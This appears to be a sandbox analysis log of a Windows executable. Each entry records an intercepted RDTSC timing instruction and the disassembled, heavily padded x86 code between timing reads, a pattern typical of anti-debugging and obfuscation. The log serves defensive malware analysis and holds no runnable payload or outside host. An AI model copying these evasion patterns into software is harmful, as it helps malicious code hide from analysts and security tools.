Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBB20 second address: 5DBB4B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push edi 0x0000000d push ecx 0x0000000e jnp 00007F02B8F2D486h 0x00000014 pop ecx 0x00000015 pop edi 0x00000016 pop eax 0x00000017 mov esi, dword ptr [ebp+122D1E35h] 0x0000001d push 94D77034h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 jns 00007F02B8F2D486h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBB4B second address: 5DBB66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBB66 second address: 5DBB6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBFA8 second address: 5DBFBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBFBA second address: 5DBFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC7B5 second address: 5DC7CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F02B8F275EEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC7CB second address: 5DC7CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC7CF second address: 5DC7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F02B8F275EDh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC87B second address: 5DC87F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC87F second address: 5DC885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC885 second address: 5DC88A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DCED5 second address: 5DCED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DCED9 second address: 5DCEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DCEE3 second address: 5DCEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DCEE7 second address: 5DCF07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F02B8F2D491h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DE356 second address: 5DE369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F02B8F275EDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DE369 second address: 5DE379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F02B8F2D486h 0x0000000a jnp 00007F02B8F2D486h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DEA85 second address: 5DEA8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DEA8B second address: 5DEAF1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F02B8F2D486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jne 00007F02B8F2D49Dh 0x00000013 nop 0x00000014 or dword ptr [ebp+122D235Dh], eax 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D2298h], esi 0x00000022 push 00000000h 0x00000024 movsx edi, ax 0x00000027 jnc 00007F02B8F2D489h 0x0000002d xchg eax, ebx 0x0000002e jmp 00007F02B8F2D494h 0x00000033 push eax 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 jnl 00007F02B8F2D486h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DF4F6 second address: 5DF571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F02B8F275E8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 movsx esi, cx 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F02B8F275E8h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 00000019h 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 movsx esi, cx 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push ebp 0x0000004a call 00007F02B8F275E8h 0x0000004f pop ebp 0x00000050 mov dword ptr [esp+04h], ebp 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc ebp 0x0000005d push ebp 0x0000005e ret 0x0000005f pop ebp 0x00000060 ret 0x00000061 sub esi, dword ptr [ebp+122D391Fh] 0x00000067 xchg eax, ebx 0x00000068 push edx 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DFF11 second address: 5DFF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 jg 00007F02B8F2D486h 0x0000000f pop edi 0x00000010 jnc 00007F02B8F2D48Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E1CB9 second address: 5E1CBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E1CBD second address: 5E1CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E3210 second address: 5E3215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E2FC3 second address: 5E2FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E3215 second address: 5E321B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E2FC8 second address: 5E2FE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D499h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E321B second address: 5E3258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c and esi, 46E1C683h 0x00000012 push 00000000h 0x00000014 sub dword ptr [ebp+122D2BC1h], ebx 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+12460930h], edi 0x00000022 sub di, F6E3h 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F02B8F275EDh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E3258 second address: 5E326E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F02B8F2D48Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E7BDB second address: 5E7BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E8130 second address: 5E81AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push esi 0x00000006 jo 00007F02B8F2D488h 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F02B8F2D488h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov ebx, ecx 0x0000002c push 00000000h 0x0000002e jmp 00007F02B8F2D495h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F02B8F2D488h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f push eax 0x00000050 pushad 0x00000051 jmp 00007F02B8F2D491h 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E81AD second address: 5E81B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E8F63 second address: 5E8F69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E8F69 second address: 5E8F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E8F6D second address: 5E8F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F02B8F2D486h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E8F7F second address: 5E8FC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F02B8F275EDh 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F02B8F275E8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 movzx edi, dx 0x0000002c push 00000000h 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 push esi 0x00000032 push esi 0x00000033 pop esi 0x00000034 pop esi 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E911B second address: 5E9128 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F02B8F2D486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EAFF9 second address: 5EAFFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EA2D6 second address: 5EA2DC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E9242 second address: 5E9254 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F02B8F275E6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EA2DC second address: 5EA2F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007F02B8F2D486h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007F02B8F2D498h 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F02B8F2D486h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EA2F7 second address: 5EA2FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ED175 second address: 5ED190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D497h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ED190 second address: 5ED1E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov bh, al 0x0000000d push 00000000h 0x0000000f pushad 0x00000010 push esi 0x00000011 mov dword ptr [ebp+122D2747h], ebx 0x00000017 pop eax 0x00000018 popad 0x00000019 jc 00007F02B8F275ECh 0x0000001f mov dword ptr [ebp+1247C90Bh], eax 0x00000025 push 00000000h 0x00000027 jmp 00007F02B8F275F0h 0x0000002c mov ebx, dword ptr [ebp+122D3843h] 0x00000032 xchg eax, esi 0x00000033 jmp 00007F02B8F275EDh 0x00000038 push eax 0x00000039 pushad 0x0000003a push edi 0x0000003b push esi 0x0000003c pop esi 0x0000003d pop edi 0x0000003e pushad 0x0000003f push esi 0x00000040 pop esi 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EF25B second address: 5EF27A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F02B8F2D494h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EF27A second address: 5EF2EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F02B8F275E6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F02B8F275E8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 movsx edi, si 0x0000002c push 00000000h 0x0000002e or dword ptr [ebp+12453D89h], edx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F02B8F275E8h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 mov di, 0601h 0x00000054 mov dword ptr [ebp+1248396Dh], ebx 0x0000005a push eax 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e push ebx 0x0000005f pop ebx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EF2EE second address: 5EF2F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F024C second address: 5F02B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F02B8F275E8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 jne 00007F02B8F275F4h 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+1244ED24h] 0x00000030 push 00000000h 0x00000032 call 00007F02B8F275EBh 0x00000037 mov ebx, dword ptr [ebp+122D3863h] 0x0000003d pop ebx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jne 00007F02B8F275ECh 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F02B8 second address: 5F02BD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F22F4 second address: 5F2382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F275F0h 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F02B8F275EFh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F02B8F275E8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov ebx, dword ptr [ebp+122D3867h] 0x00000031 push 00000000h 0x00000033 sbb bx, B4B0h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push esi 0x0000003d call 00007F02B8F275E8h 0x00000042 pop esi 0x00000043 mov dword ptr [esp+04h], esi 0x00000047 add dword ptr [esp+04h], 00000015h 0x0000004f inc esi 0x00000050 push esi 0x00000051 ret 0x00000052 pop esi 0x00000053 ret 0x00000054 mov dword ptr [ebp+122D2C9Bh], edx 0x0000005a mov edi, 29725402h 0x0000005f mov dword ptr [ebp+122D2704h], eax 0x00000065 xchg eax, esi 0x00000066 push eax 0x00000067 push edx 0x00000068 jnc 00007F02B8F275E8h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F558C second address: 5F55B7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F02B8F2D488h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F02B8F2D499h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F55B7 second address: 5F55BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F149A second address: 5F1580 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D494h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F02B8F2D488h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2307h], eax 0x0000002c call 00007F02B8F2D48Dh 0x00000031 or di, FE43h 0x00000036 pop ebx 0x00000037 push dword ptr fs:[00000000h] 0x0000003e jp 00007F02B8F2D48Ch 0x00000044 mov edi, 410CE05Ch 0x00000049 mov dword ptr fs:[00000000h], esp 0x00000050 mov bl, 54h 0x00000052 mov eax, dword ptr [ebp+122D0D29h] 0x00000058 push 00000000h 0x0000005a push ebp 0x0000005b call 00007F02B8F2D488h 0x00000060 pop ebp 0x00000061 mov dword ptr [esp+04h], ebp 0x00000065 add dword ptr [esp+04h], 00000019h 0x0000006d inc ebp 0x0000006e push ebp 0x0000006f ret 0x00000070 pop ebp 0x00000071 ret 0x00000072 mov ebx, dword ptr [ebp+122D39B3h] 0x00000078 sub dword ptr [ebp+1247DC7Ch], ebx 0x0000007e push FFFFFFFFh 0x00000080 mov ebx, 10A97371h 0x00000085 nop 0x00000086 pushad 0x00000087 push edx 0x00000088 jmp 00007F02B8F2D497h 0x0000008d pop edx 0x0000008e push eax 0x0000008f push edx 0x00000090 jmp 00007F02B8F2D495h 0x00000095 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F1580 second address: 5F158D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F158D second address: 5F1596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F64A9 second address: 5F64BB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F02B8F275E6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F5767 second address: 5F576B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F576B second address: 5F5777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FAA73 second address: 5FAA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F02B8F2D486h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FAA7D second address: 5FAA94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007F02B8F2760Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 jg 00007F02B8F275E6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FAA94 second address: 5FAA98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FEDCA second address: 5FEDFD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F02B8F275F4h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F02B8F275F7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60200A second address: 602010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 602010 second address: 602016 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 606BAD second address: 606BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 606BB1 second address: 606BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F02B8F275E8h 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f push edx 0x00000010 push edi 0x00000011 jmp 00007F02B8F275F7h 0x00000016 pop edi 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 606C66 second address: 606C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60D2F7 second address: 60D317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F02B8F275ECh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F02B8F275FEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60D317 second address: 60D334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F2D492h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60D334 second address: 60D339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
